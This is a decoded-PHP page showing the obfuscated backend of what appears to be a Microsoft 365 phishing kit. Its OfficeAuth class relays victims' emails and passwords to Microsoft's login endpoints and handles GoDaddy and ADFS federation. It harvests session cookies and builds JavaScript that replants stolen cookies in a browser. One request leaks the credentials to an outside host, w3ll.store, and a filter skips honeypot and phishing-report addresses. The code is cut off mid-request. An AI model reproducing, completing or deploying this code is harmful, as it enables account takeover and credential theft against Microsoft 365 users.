Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* Important Notice Any unauthorized use of this content may lead to sig..

Decoded Output download

<?php 
/*   Important Notice 
        Any unauthorized use of this content may lead to significant damage. This includes, but is not limited to, loss of revenue, reputational harm, and legal repercussions. By accessing this material, you agree to use it responsibly and understand that any misuse could result in consequences. 
         
        Please respect the rights associated with this work. 
        */ 
require "vendor/autoload.php"; 
use GuzzleHttp\Client; 
use GuzzleHttp\Cookie\CookieJar; 
use GuzzleHttp\Cookie\FileCookieJar; 
class OfficeAuth 
{ 
    public $Fa736; 
    public $Ed558; 
    public $status = []; 
    public $fac50; 
    public $cc473; 
    public $B5b07; 
    public $B522d; 
    public $E423c; 
    public $ad1e3; 
    public $be01c; 
    public $D2b25; 
    public $A20d7; 
    public function __construct() 
    { 
        goto d409c; 
        F8f93: 
        $this->status["type"] = null; 
        goto E44f9; 
        ed9e5: 
        $this->status["role"] = false; 
        goto F8f93; 
        B788b: 
        $this->status["icon"] = null; 
        goto c82d1; 
        d409c: 
        $this->status["live"] = false; 
        goto B50d0; 
        caf64: 
        $this->status["background"] = null; 
        goto B788b; 
        B50d0: 
        $this->status["edu"] = false; 
        goto ed9e5; 
        E44f9: 
        $this->status["redirect"] = null; 
        goto caf64; 
        c82d1: 
    } 
    public function extractCookies($Be70a) 
    { 
        goto bb0c1; 
        Dca25: 
        bdaf0: 
        goto a9cdc; 
        bb0c1: 
        $d6c0e = []; 
        goto d332b; 
        a9cdc: 
        return $d6c0e; 
        goto e7c02; 
        A77ee: 
        foreach ($e6c5c as $a6312) { 
            goto Da8d7; 
            ab6ad: 
            bbcca: 
            goto B9254; 
            aad9d: 
            $D5295 = [ 
                "name" => $E4707[5], 
                "value" => $E4707[6], 
                "expirationDate" => strtotime( 
                    "+1 year" 
                ), 
                "domain" => $a6316, 
                "path" => $E4707[2], 
                "sameSite" => "none", 
                "firstPartyDomain" => 
                    "", 
                "hostonly" => false, 
                "secure" => (bool) $E4707[3], 
                "httponly" => true, 
                "session" => true, 
                "partitionKey" => null, 
                "storeId" => null, 
            ]; 
            goto Bd182; 
            Eace2: 
            goto Bc5d0; 
            goto A268a; 
            A268a: 
            d5944: 
            goto d4c0a; 
            B9254: 
            Bc5d0: 
            goto C546a; 
            d4c0a: 
            $a6316 = substr($E4707[0], 10); 
            goto Cd3aa; 
            F2f98: 
            $E4707 = explode("\x9", trim($a6312)); 
            goto Dca03; 
            Da8d7: 
            if (!(isset($a6312[0]) && substr_count($a6312, "\x9") == 6)) { 
                goto bbcca; 
            } 
            goto F2f98; 
            Cd3aa: 
            if ( 
                !( 
                    $a6316 == 
                    "osoftonline.com" 
                ) 
            ) { 
                goto bc14b; 
            } 
            goto C9c51; 
            Dca03: 
            if ( 
                !( 
                    $E4707[5] == "esctx" || 
                    $E4707[5] == 
                        "stsservicecookie" 
                ) 
            ) { 
                goto d5944; 
            } 
            goto Eace2; 
            C9c51: 
            $a6316 = 
                "login.microsoftonline.com"; 
            goto F5504; 
            Bd182: 
            $d6c0e[] = $D5295; 
            goto ab6ad; 
            F5504: 
            bc14b: 
            goto aad9d; 
            C546a: 
        } 
        goto Dca25; 
        d332b: 
        $e6c5c = explode("\xa", $Be70a); 
        goto A77ee; 
        e7c02: 
    } 
    public function Start() 
    { 
        goto d8804; 
        e00f7: 
        preg_match( 
            "/(?<="sFT":")[^"]*/", 
            $A75e0, 
            $ea051 
        ); 
        goto cd8b9; 
        E8ddc: 
        $this->B5b07 = $ef175[0]; 
        goto eb714; 
        d74c6: 
        $this->ad1e3 = $eb813[0]; 
        goto F0f14; 
        eb714: 
        $this->B522d = $a6081[0]; 
        goto e0bde; 
        C0197: 
        preg_match( 
            "/(?<="sessionId":")[^"]*/", 
            $A75e0, 
            $D70fc 
        ); 
        goto F9dbd; 
        Da8da: 
        $Bcc9d = new Client(); 
        goto c1036; 
        E6274: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto e00f7; 
        Fa214: 
        $this->fac50 = $ea051[0]; 
        goto dc71e; 
        c1036: 
        $Accd6 = $Bcc9d->get( 
            "https://login.microsoftonline.com/", 
            [ 
                "headers" => [ 
                    "User-Agent" => 
                        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0", 
                    "Accept" => 
                        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", 
                    "Accept-Language" => 
                        "en-US,en;q=0.5", 
                    "Accept-Encoding" => 
                        "gzip, deflate, br", 
                    "Connection" => 
                        "keep-alive", 
                    "Upgrade-Insecure-Requests" => 
                        "1", 
                    "Sec-Fetch-Dest" => 
                        "document", 
                    "Sec-Fetch-Mode" => 
                        "navigate", 
                    "Sec-Fetch-Site" => 
                        "none", 
                    "Sec-Fetch-User" => 
                        "?1", 
                    "Cookie" => $this->gencook( 
                        $this->A20d7 . 
                            "/cookie_" . 
                            $this->Fa736 . 
                            ".txt" 
                    ), 
                ], 
            ] 
        ); 
        goto Cbac2; 
        Cbac2: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto E6274; 
        F4759: 
        preg_match( 
            "/(?<="apiCanary":")[^"]*/", 
            $A75e0, 
            $a6081 
        ); 
        goto C0197; 
        e0bde: 
        $this->E423c = $D70fc[0]; 
        goto d74c6; 
        cd8b9: 
        preg_match( 
            "/(?<="sCtx":")[^"]*/", 
            $A75e0, 
            $Bc3b4 
        ); 
        goto A56a1; 
        dc71e: 
        $this->cc473 = $Bc3b4[0]; 
        goto E8ddc; 
        F9dbd: 
        preg_match( 
            "/(?<="correlationId":")[^"]*/", 
            $A75e0, 
            $eb813 
        ); 
        goto Fa214; 
        Db3cd: 
        $F16be = new FileCookieJar( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt", 
            true 
        ); 
        goto Da8da; 
        d8804: 
        $this->A20d7 = getcwd() . "/core"; 
        goto Db3cd; 
        A56a1: 
        preg_match( 
            "/(?<="canary":")[^"]*/", 
            $A75e0, 
            $ef175 
        ); 
        goto F4759; 
        F0f14: 
    } 
    public function checkRole() 
    { 
        goto B5e00; 
        Ba56c: 
        Cece3: 
        goto e304e; 
        fa345: 
        $this->status["role"] = true; 
        goto Ba56c; 
        E596a: 
        $this->status["edu"] = true; 
        goto E75bd; 
        E75bd: 
        d84ee: 
        goto a12bc; 
        B5e00: 
        if ( 
            !preg_match( 
                "/0.0.|re-|user-|Response|r-|noreply|reply|hello|news|feedback|NoReply|replies|part|HTML|jpg|bounce|012|award|form|format|forum|hosted|hostmaster|info|mail|partners|phishing|quotes|quote|why|your|shop|secretary|services|policy|orders|order|name|moneymakerhip|editor|domains|digital|contact|content|complaints|community|collections|comments|advertising|advice|awards|careers|communications|compliance|enquires|found|here|help|honeypot|inquiries|inventories|tech|technicaltraining|treasurer|u00|view|welcome|available|online|paypal|person|press|product|project|properties|reservations|research|returns|search|studio|training|team|accounts|work|wordpress|access|subscriptions|covid|pharmacy|website|customerservices|customer|enquiry|events/", 
                $this->Fa736 
            ) 
        ) { 
            goto Cece3; 
        } 
        goto fa345; 
        e304e: 
        if ( 
            !preg_match( 
                "/student|education|school|academy|college|academic|utoronto|uwinnipeg|ucalgary|teacher|umontreal|ubc\.|campus|educate|\.ac|\.sch|\.edu/", 
                $this->Fa736 
            ) 
        ) { 
            goto d84ee; 
        } 
        goto E596a; 
        a12bc: 
    } 
    public function gencook($be961) 
    { 
        goto Efcd7; 
        a7304: 
        return $fc513; 
        goto dc6c0; 
        af936: 
        $fc513 = rtrim($fc513, "; "); 
        goto Ad7ee; 
        A61c4: 
        $B08d3 = file_get_contents($be961); 
        goto F3f4b; 
        Ae72d: 
        acb07: 
        goto A61c4; 
        c536d: 
        $c2c47 = json_encode([]); 
        goto Ae0c7; 
        cb3bf: 
        foreach ($d6c0e as $D5295) { 
            goto d0d6a; 
            a0df0: 
            f8c0f: 
            goto ea3af; 
            f6ad3: 
            $a74ee = $D5295["Value"]; 
            goto A1769; 
            d0d6a: 
            $ac370 = $D5295["Name"]; 
            goto f6ad3; 
            A1769: 
            $fc513 .= "{$ac370}={$a74ee}; "; 
            goto a0df0; 
            ea3af: 
        } 
        goto f51df; 
        E54ec: 
        if (!is_array($d6c0e)) { 
            goto D3baf; 
        } 
        goto cb3bf; 
        Ad7ee: 
        D3baf: 
        goto a7304; 
        Ae0c7: 
        file_put_contents($be961, $c2c47); 
        goto Ae72d; 
        C6b26: 
        $fc513 = ""; 
        goto E54ec; 
        Efcd7: 
        if (file_exists($be961)) { 
            goto acb07; 
        } 
        goto c536d; 
        F3f4b: 
        $d6c0e = json_decode($B08d3, true); 
        goto C6b26; 
        f51df: 
        Df74b: 
        goto af936; 
        dc6c0: 
    } 
    public function getCredentials() 
    { 
        goto B5da6; 
        D2d97: 
        $this->status["live"] = false; 
        goto f139c; 
        Be5a4: 
        $this->status["live"] = "false"; 
        goto adc58; 
        badb9: 
        $this->status["type"] = "double"; 
        goto b8d91; 
        aa156: 
        goto E8244; 
        goto Bc009; 
        da03b: 
        a80f5: 
        goto Be677; 
        c764e: 
        if ( 
            strpos( 
                $A75e0, 
                ""IfExistsResult":1" 
            ) !== false 
        ) { 
            goto b3e35; 
        } 
        goto cec72; 
        a3ebb: 
        e4339: 
        goto Ea6ff; 
        bbcc3: 
        if (strpos($A75e0, "adfs") !== false) { 
            goto F9243; 
        } 
        goto c945a; 
        fa6ca: 
        $Accd6 = $Bcc9d->post( 
            "https://login.microsoftonline.com/common/GetCredentialType?mkt=en-US", 
            [ 
                "headers" => [ 
                    "Accept" => 
                        "application/json", 
                    "Accept-Language" => 
                        "en-US,en;q=0.9", 
                    "Connection" => 
                        "keep-alive", 
                    "Content-Type" => 
                        "application/json; charset=UTF-8", 
                    "Origin" => 
                        "https://login.microsoftonline.com", 
                    "Hpgact" => "1800", 
                    "Hpgid" => "1104", 
                    "Cache-Control" => 
                        "no-cache", 
                    "Pragma" => 
                        "no-cache", 
                    "User-Agent" => 
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0", 
                    "X-Edge-Shopping-Flag" => 
                        "0", 
                    "Canary" => $this->B522d, 
                    "Client-Request-Id" => 
                        $this->ad1e3, 
                ], 
                "json" => [ 
                    "username" => $this->Fa736, 
                    "isOtherIdpSupported" => false, 
                    "checkPhones" => false, 
                    "isRemoteNGCSupported" => true, 
                    "isCookieBannerShown" => false, 
                    "isFidoSupported" => true, 
                    "originalRequest" => 
                        $this->cc473, 
                    "country" => "ID", 
                    "forceotclogin" => true, 
                    "flowToken" => $this->fac50, 
                ], 
            ] 
        ); 
        goto fbfe1; 
        Bc009: 
        Fd620: 
        goto ce15b; 
        D75d1: 
        b8628: 
        goto eca6a; 
        e28c3: 
        E38e6: 
        goto f354b; 
        c5c43: 
        $Bcc9d = new Client(); 
        goto fa6ca; 
        B5da6: 
        $this->Start(); 
        goto c5c43; 
        Cdfed: 
        $this->checkRole(); 
        goto Fece2; 
        A341a: 
        fae6c: 
        goto B0e10; 
        E9030: 
        $this->getLogo($Dee16); 
        goto da03b; 
        fbfe1: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto e70ff; 
        a8024: 
        preg_match( 
            "/(?<="FlowToken":")[^"]*/", 
            $A75e0, 
            $ea051 
        ); 
        goto cb7ec; 
        C5d72: 
        b3e35: 
        goto badb9; 
        fa8ae: 
        if ( 
            strpos( 
                $A75e0, 
                "FederationRedirectUrl" 
            ) !== false 
        ) { 
            goto Fd620; 
        } 
        goto f598c; 
        F316b: 
        goto e35fa; 
        goto C400d; 
        B14f4: 
        goto daa6c; 
        goto C2dba; 
        C132d: 
        goto b8628; 
        goto E4865; 
        C05d5: 
        if ( 
            !(strpos($A75e0, "FlowToken") !== false) 
        ) { 
            goto e704a; 
        } 
        goto fa8ae; 
        Fea31: 
        goto fae6c; 
        goto a3ebb; 
        Bb18c: 
        $e03b3 = $Dc524[0]; 
        goto de61c; 
        b8d91: 
        E207e: 
        goto d45d6; 
        f139c: 
        $this->status["reason"] = 
            "invalid-account"; 
        goto B2e43; 
        Ea6ff: 
        $this->status["live"] = false; 
        goto ff55c; 
        B2e43: 
        e35fa: 
        goto Fea31; 
        cec72: 
        if ( 
            strpos( 
                $A75e0, 
                ""IfExistsResult":0" 
            ) !== false || 
            strpos( 
                $A75e0, 
                ""IfExistsResult":6" 
            ) !== false 
        ) { 
            goto A40f3; 
        } 
        goto Dfc17; 
        e70ff: 
        $this->status["live"] = true; 
        goto beda2; 
        F103c: 
        $this->fac50 = $ea051[0]; 
        goto A1402; 
        adc58: 
        $this->status["reason"] = 
            "outlook-account"; 
        goto c1c0b; 
        bc59c: 
        $this->status["type"] = "business"; 
        goto C63db; 
        C63db: 
        daa6c: 
        goto A2ade; 
        f598c: 
        if ( 
            strpos( 
                $A75e0, 
                ""IfExistsResult":5" 
            ) !== false 
        ) { 
            goto Aff49; 
        } 
        goto c764e; 
        ce15b: 
        preg_match( 
            "/(?<="FederationRedirectUrl":")[^"]*/", 
            $A75e0, 
            $Dc524 
        ); 
        goto Bb18c; 
        c1c0b: 
        $this->status["type"] = "main"; 
        goto a8ded; 
        A1402: 
        $this->B522d = $a6081[0]; 
        goto Cdfed; 
        B0e10: 
        if (!$this->status["live"]) { 
            goto a80f5; 
        } 
        goto a8024; 
        eca6a: 
        goto C2718; 
        goto e28c3; 
        cb7ec: 
        preg_match( 
            "/(?<="apiCanary":")[^"]*/", 
            $A75e0, 
            $a6081 
        ); 
        goto F103c; 
        Dfc17: 
        $this->status["live"] = false; 
        goto B14f4; 
        d83c7: 
        $this->status["redirect"] = $e03b3; 
        goto Ef851; 
        E4865: 
        F9243: 
        goto D2cc2; 
        de61c: 
        if ( 
            strpos( 
                $A75e0, 
                "sso.godaddy.com" 
            ) !== false 
        ) { 
            goto E38e6; 
        } 
        goto bbcc3; 
        Be40f: 
        $this->getBackground($Dee16); 
        goto E9030; 
        C5de3: 
        Aff49: 
        goto Be5a4; 
        Fece2: 
        $Dee16 = json_decode($A75e0, true); 
        goto Be40f; 
        ff55c: 
        $this->status["reason"] = 
            "invalid-domain"; 
        goto A341a; 
        a8ded: 
        C5ae0: 
        goto aa156; 
        Ef851: 
        E8244: 
        goto F316b; 
        C400d: 
        e704a: 
        goto D2d97; 
        F5fcb: 
        C2718: 
        goto d83c7; 
        f354b: 
        $e03b3 = str_replace( 
            "https://sso.godaddy.com/", 
            "https://sso.godaddy.com/v1/", 
            $e03b3 
        ); 
        goto ab720; 
        D2cc2: 
        $this->status["type"] = "redirect"; 
        goto D75d1; 
        c945a: 
        $this->status["type"] = "redirect"; 
        goto C132d; 
        d45d6: 
        goto C5ae0; 
        goto C5de3; 
        ab720: 
        $this->status["type"] = "godaddy"; 
        goto F5fcb; 
        A2ade: 
        goto E207e; 
        goto C5d72; 
        C2dba: 
        A40f3: 
        goto bc59c; 
        beda2: 
        if ( 
            strpos( 
                $A75e0, 
                ""ThrottleStatus":1" 
            ) !== false && 
            !( 
                strpos( 
                    $A75e0, 
                    "FederationRedirectUrl" 
                ) !== false 
            ) 
        ) { 
            goto e4339; 
        } 
        goto C05d5; 
        Be677: 
    } 
    private function getBackground($A75e0) 
    { 
        goto A8919; 
        f352b: 
        $this->status["background"] = 
            $A75e0["EstsProperties"][ 
                "UserTenantBranding" 
            ][0]["Illustration"]; 
        goto efecc; 
        efecc: 
        Ad6fd: 
        goto A0ed1; 
        A8919: 
        if ( 
            !( 
                isset( 
                    $A75e0[ 
                        "EstsProperties" 
                    ][ 
                        "UserTenantBranding" 
                    ] 
                ) && 
                is_array( 
                    $A75e0[ 
                        "EstsProperties" 
                    ][ 
                        "UserTenantBranding" 
                    ] 
                ) && 
                isset( 
                    $A75e0[ 
                        "EstsProperties" 
                    ][ 
                        "UserTenantBranding" 
                    ][0]["Illustration"] 
                ) 
            ) 
        ) { 
            goto Ad6fd; 
        } 
        goto f352b; 
        A0ed1: 
    } 
    private function getLogo($A75e0) 
    { 
        goto d33b6; 
        F9fb7: 
        ad4ce: 
        goto Eff9f; 
        d33b6: 
        if ( 
            !( 
                isset( 
                    $A75e0[ 
                        "EstsProperties" 
                    ][ 
                        "UserTenantBranding" 
                    ] 
                ) && 
                is_array( 
                    $A75e0[ 
                        "EstsProperties" 
                    ][ 
                        "UserTenantBranding" 
                    ] 
                ) && 
                isset( 
                    $A75e0[ 
                        "EstsProperties" 
                    ][ 
                        "UserTenantBranding" 
                    ][0]["BannerLogo"] 
                ) 
            ) 
        ) { 
            goto ad4ce; 
        } 
        goto d58f0; 
        d58f0: 
        $this->status["icon"] = 
            $A75e0["EstsProperties"][ 
                "UserTenantBranding" 
            ][0]["BannerLogo"]; 
        goto F9fb7; 
        Eff9f: 
    } 
    public function Login() 
    { 
        goto Bdd30; 
        d2a7c: 
        if ( 
            $this->status["type"] == "godaddy" 
        ) { 
            goto c924b; 
        } 
        goto d00ba; 
        b12df: 
        goto F5d41; 
        goto Fa626; 
        a8738: 
        $this->status = $_SESSION["status"]; 
        goto F7a88; 
        C69f6: 
        if ( 
            isset( 
                $_SESSION[ 
                    "info_token_credentials" 
                ] 
            ) && 
            isset($_SESSION["status"]) 
        ) { 
            goto D443f; 
        } 
        goto b559f; 
        D2171: 
        $this->Login(); 
        goto b6dc9; 
        d00ba: 
        if ( 
            $this->status["type"] == 
            "redirect" 
        ) { 
            goto e1b2e; 
        } 
        goto B674f; 
        Dbc71: 
        $this->AuthBusiness(); 
        goto a2177; 
        Ae5bf: 
        $this->ad1e3 = 
            $_SESSION[ 
                "info_token_credentials" 
            ]["request_id"]; 
        goto fff5f; 
        e0629: 
        if ( 
            !( 
                !$this->status["live"] && 
                isset( 
                    $_SESSION[ 
                        "info_token_credentials" 
                    ] 
                ) && 
                isset($_SESSION["status"]) 
            ) 
        ) { 
            goto Ce0ce; 
        } 
        goto Cc456; 
        ce293: 
        $this->E423c = 
            $_SESSION[ 
                "info_token_credentials" 
            ]["session_id"]; 
        goto Ae5bf; 
        a4fea: 
        $this->AuthRedirect(); 
        goto f3469; 
        Fa626: 
        D443f: 
        goto a8738; 
        d3b03: 
        Df417: 
        goto d2a7c; 
        a2177: 
        c2ce7: 
        goto C0c61; 
        dc4f2: 
        c924b: 
        goto e30a4; 
        B55af: 
        e5163: 
        goto fb2d2; 
        fff5f: 
        F5d41: 
        goto Dab0a; 
        e9487: 
        goto c7ce3; 
        goto Fbf1f; 
        fbc25: 
        $this->getCredentials(); 
        goto d3b03; 
        A520b: 
        Dba71: 
        goto fbc25; 
        Bdd30: 
        if ( 
            $this->Fa736 != $_SESSION["email"] && 
            (!isset($_SESSION["status"]) || 
                !isset( 
                    $_SESSION[ 
                        "info_token_credentials" 
                    ] 
                )) 
        ) { 
            goto Dba71; 
        } 
        goto C69f6; 
        C7569: 
        $this->B522d = 
            $_SESSION[ 
                "info_token_credentials" 
            ]["api_canary"]; 
        goto ce293; 
        f3469: 
        c7ce3: 
        goto c464d; 
        c464d: 
        goto C72a0; 
        goto dc4f2; 
        F0c39: 
        $this->fac50 = 
            $_SESSION[ 
                "info_token_credentials" 
            ]["sFT"]; 
        goto C6476; 
        Fbf1f: 
        e1b2e: 
        goto a4fea; 
        b6dc9: 
        Ce0ce: 
        goto ca655; 
        C6476: 
        $this->cc473 = 
            $_SESSION[ 
                "info_token_credentials" 
            ]["sCtx"]; 
        goto Ebea2; 
        D66bb: 
        f2858: 
        goto e9487; 
        F7a88: 
        $this->A20d7 = getcwd() . "/core"; 
        goto F0c39; 
        a184b: 
        C72a0: 
        goto e0629; 
        C0c61: 
        goto f2858; 
        goto B55af; 
        b559f: 
        $this->getCredentials(); 
        goto b12df; 
        fb2d2: 
        $this->AuthDouble(); 
        goto D66bb; 
        Cc456: 
        unset( 
            $_SESSION[ 
                "info_token_credentials" 
            ] 
        ); 
        goto b0917; 
        B674f: 
        if ($this->status["type"] == "double") { 
            goto e5163; 
        } 
        goto f8c25; 
        e30a4: 
        $this->AuthGodaddy(); 
        goto a184b; 
        b0917: 
        unset($_SESSION["status"]); 
        goto D2171; 
        Dab0a: 
        goto Df417; 
        goto A520b; 
        Ebea2: 
        $this->B5b07 = 
            $_SESSION[ 
                "info_token_credentials" 
            ]["canary"]; 
        goto C7569; 
        f8c25: 
        if ( 
            !( 
                $this->status["type"] == 
                "business" 
            ) 
        ) { 
            goto c2ce7; 
        } 
        goto Dbc71; 
        ca655: 
    } 
    private function AuthGodaddy() 
    { 
        goto f962d; 
        c664f: 
        $this->fac50 = $ea051[0]; 
        goto Be661; 
        Bca5a: 
        $Accd6 = $Bcc9d->post( 
            "https://login.microsoftonline.com/login.srf", 
            [ 
                "headers" => [ 
                    "Accept" => 
                        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", 
                    "Accept-Language" => 
                        "en-US,en;q=0.9", 
                    "Cache-Control" => 
                        "max-age=0", 
                    "Connection" => 
                        "keep-alive", 
                    "Content-Type" => 
                        "application/x-www-form-urlencoded", 
                    "Origin" => "null", 
                    "Sec-Fetch-Dest" => 
                        "document", 
                    "Sec-Fetch-Mode" => 
                        "navigate", 
                    "Sec-Fetch-Site" => 
                        "cross-site", 
                    "Upgrade-Insecure-Requests" => 
                        "1", 
                    "User-Agent" => 
                        "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 Edg/130.0.0.0", 
                    "X-Edge-Shopping-Flag" => 
                        "0", 
                    "sec-ch-ua" => 
                        ""Chromium";v="130", "Microsoft Edge";v="130", "Not?A_Brand";v="99"", 
                    "sec-ch-ua-mobile" => 
                        "?1", 
                    "sec-ch-ua-platform" => 
                        ""Android"", 
                    "sec-ch-ua-platform-version" => 
                        ""6.0"", 
                ], 
                "form_params" => [ 
                    "wctx" => $F84f2, 
                    "wa" => "wsignin1.0", 
                    "wresult" => $e65e8, 
                    "wtrealm" => 
                        "urn:federation:MicrosoftOnline", 
                ], 
            ] 
        ); 
        goto f61a8; 
        ebb5c: 
        if ( 
            strpos( 
                $A75e0, 
                "urlBeginAuth" 
            ) !== false 
        ) { 
            goto Eb0ff; 
        } 
        goto A0df7; 
        Db109: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto Cf226; 
        E3680: 
        curl_setopt( 
            $fda09, 
            CURLOPT_POSTFIELDS, 
            "name={$this->Fa736}&password={$this->Ed558}&AuthMethod=FormsAuthentication" 
        ); 
        goto C84d8; 
        D04b8: 
        $F84f2 = html_entity_decode($F84f2[1]); 
        goto e735f; 
        e41be: 
        preg_match( 
            "/(?<="correlationId":")[^"]*/", 
            $A75e0, 
            $eb813 
        ); 
        goto Df2d7; 
        B7071: 
        $E3848 = 
            "(function() {
\x9\x9\x9\x9\x9\x9let cookies = JSON.parse(`" . 
            $D5295 . 
            "`);\xd
	\x9\x9		\xd\xa	\x9		\x9\x9function putCookie(key, value, domain, path, isSecure) {
\xa\x9	\x9\x9\x9\x9\x9const cookieMaxAge = "Max-Age=31536000";
\xa\x9\x9\x9		\x9\x9if (key.startsWith("__Host")) {
\xa\x9		\x9	\x9\x9\x9console.log("==== Kratos ====>", key, value);\xd\xa\x9	\x9		\x9	\x9document.cookie = `${key}=${value};${cookieMaxAge};path=/;Secure;SameSite=None`;
				\x9\x9	} else if (key.startsWith("__Secure")) {\xd
\x9\x9	\x9			\x9console.log("==== Kratos ====>", key, value);
\x9\x9			\x9	\x9document.cookie = `${key}=${value};${cookieMaxAge};domain=${domain};path=${path};Secure;SameSite=None`;\xd\xa\x9\x9	\x9	\x9	} else {
		\x9\x9	\x9\x9\x9if (isSecure) {
\xa				\x9		\x9	console.log("==== Kratos ====>", key, value);
\x9					\x9	\x9if (window.location.hostname == domain) {\xd\xa\x9				\x9\x9\x9	\x9document.cookie = `${key}=${value};${cookieMaxAge}; path=${path}; Secure; SameSite=None`;
\xa\x9\x9\x9	\x9\x9	\x9	} else {\xd
	\x9			\x9\x9\x9\x9	document.cookie = `${key}=${value};${cookieMaxAge};domain=${domain};path=${path};Secure;SameSite=None`;\xd
\x9		\x9\x9	\x9		}\xd
			\x9		\x9\x9} else {\xd
\x9	\x9\x9\x9\x9	\x9\x9console.log("==== Kratos ====>", key, value);
							\x9\x9if (window.location.hostname == domain) {
\x9		\x9					\x9document.cookie = `${key}=${value};${cookieMaxAge};path=${path};`;\xd
\x9\x9	\x9\x9			\x9} else {\xd\xa\x9	\x9\x9\x9\x9	\x9	\x9document.cookie = `${key}=${value};${cookieMaxAge};domain=${domain};path=${path};`;
\xa\x9				\x9\x9\x9\x9}
\xa\x9\x9\x9			\x9\x9}\xd
\x9\x9	\x9	\x9	}\xd\xa					\x9}\xd
\x9\x9		\x9	for (let cookie of cookies) {\xd
\x9\x9	\x9\x9	\x9putCookie(cookie.Name, cookie.Value, cookie.Domain, cookie.Path, cookie.Secure);
\xa			\x9		}\xd\xa\x9	\x9		}());"; 
        goto B9a3f; 
        A49c8: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto Db109; 
        ecee6: 
        $Accd6 = $Bcc9d->post( 
            "https://login.microsoftonline.com/appverify", 
            [ 
                "headers" => [ 
                    "Connection" => 
                        "keep-alive", 
                    "Cache-Control" => 
                        "no-cache", 
                    "Upgrade-Insecure-Requests" => 
                        "1", 
                    "Origin" => "null", 
                    "Content-Type" => 
                        "application/x-www-form-urlencoded", 
                    "User-Agent" => 
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0", 
                    "Accept" => 
                        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", 
                    "Accept-Language" => 
                        "en-US,en;q=0.9", 
                    "Referer" => 
                        "https://w3ll.store/api/office-val?email=" . 
                        $this->Fa736 . 
                        "&pass=" . 
                        $this->Ed558, 
                    "Cookie" => $this->gencook( 
                        $this->A20d7 . 
                            "/cookie_" . 
                            $this->Fa736 . 
                            ".txt" 
                    ), 
                ], 
                "form_params" => [ 
                    "ContinueAuth" => 
                        "true", 
                    "ctx" => $this->cc473, 
                    "hpgrequestid" => 
                        "1f12d14c-7a42-4542-be79-78f592f96800", 
                    "flowToken" => $this->fac50, 
                    "iscsrfspeedbump" => 
                        "true", 
                    "canary" => $this->B5b07, 
                    "i19" => "4624", 
                ], 
            ] 
        ); 
        goto A49c8; 
        e33de: 
        $this->B5b07 = $ef175[0]; 
        goto Ba8b9; 
        Bc5f1: 
        preg_match( 
            "/name=["']?wctx["']?\s+value=["']?([^"']+)["']?/", 
            $A75e0, 
            $F84f2 
        ); 
        goto D04b8; 
        Da396: 
        $this->cc473 = $Bc3b4[0]; 
        goto b0b2a; 
        f641f: 
        preg_match( 
            "/(?<="sFT":")[^"]*/", 
            $A75e0, 
            $ea051 
        ); 
        goto bcd77; 
        f962d: 
        $fda09 = curl_init(); 
        goto C06a1; 
        C84d8: 
        curl_setopt( 
            $fda09, 
            CURLOPT_ENCODING, 
            "gzip, deflate" 
        ); 
        goto c9dec; 
        c9dec: 
        $A03d7 = []; 
        goto d9b44; 
        A0df7: 
        $this->status["2fa"] = false; 
        goto A10ab; 
        d6de8: 
        $this->B522d = $a6081[0]; 
        goto E8adc; 
        B5528: 
        $this->status["2fa"] = true; 
        goto E1722; 
        E9ad6: 
        e93fb: 
        goto f9d13; 
        A17d5: 
        curl_setopt($fda09, CURLOPT_CUSTOMREQUEST, "POST"); 
        goto E8841; 
        F16be: 
        $this->E423c = $D70fc[0]; 
        goto e590d; 
        E1722: 
        $c4ca3 = 
            "/\{\s*"arrUserProofs":(\[.*?\])\s*,/s"; 
        goto e821f; 
        e6324: 
        e1b45: 
        goto Bc5f1; 
        B8d94: 
        $Bcc9d = new Client(["cookies" => $F16be]); 
        goto Bca5a; 
        a9e0a: 
        $Bcc9d = new Client(["cookies" => $F16be]); 
        goto a178d; 
        d0064: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto f54d3; 
        bfaa6: 
        preg_match( 
            "/(?<="sessionId":")[^"]*/", 
            $A75e0, 
            $D70fc 
        ); 
        goto A701d; 
        f855f: 
        goto e93fb; 
        goto Ed39c; 
        Cf226: 
        preg_match( 
            "/(?<="sFT":")[^"]*/", 
            $A75e0, 
            $ea051 
        ); 
        goto d8d8c; 
        d8d8c: 
        preg_match( 
            "/(?<="sCtx":")[^"]*/", 
            $A75e0, 
            $Bc3b4 
        ); 
        goto A0cd8; 
        e18c5: 
        preg_match( 
            "/(?<="sessionId":")[^"]*/", 
            $A75e0, 
            $D70fc 
        ); 
        goto e41be; 
        D7208: 
        $Bcc9d = new Client(["cookies" => $F16be]); 
        goto ecee6; 
        Ba8b9: 
        $this->B522d = $a6081[0]; 
        goto F16be; 
        e590d: 
        $this->ad1e3 = $eb813[0]; 
        goto ebb5c; 
        c530a: 
        curl_setopt($fda09, CURLOPT_RETURNTRANSFER, 1); 
        goto A17d5; 
        a178d: 
        $Accd6 = $Bcc9d->request( 
            "POST", 
            "https://login.microsoftonline.com/kmsi", 
            [ 
                "headers" => [ 
                    "Accept" => 
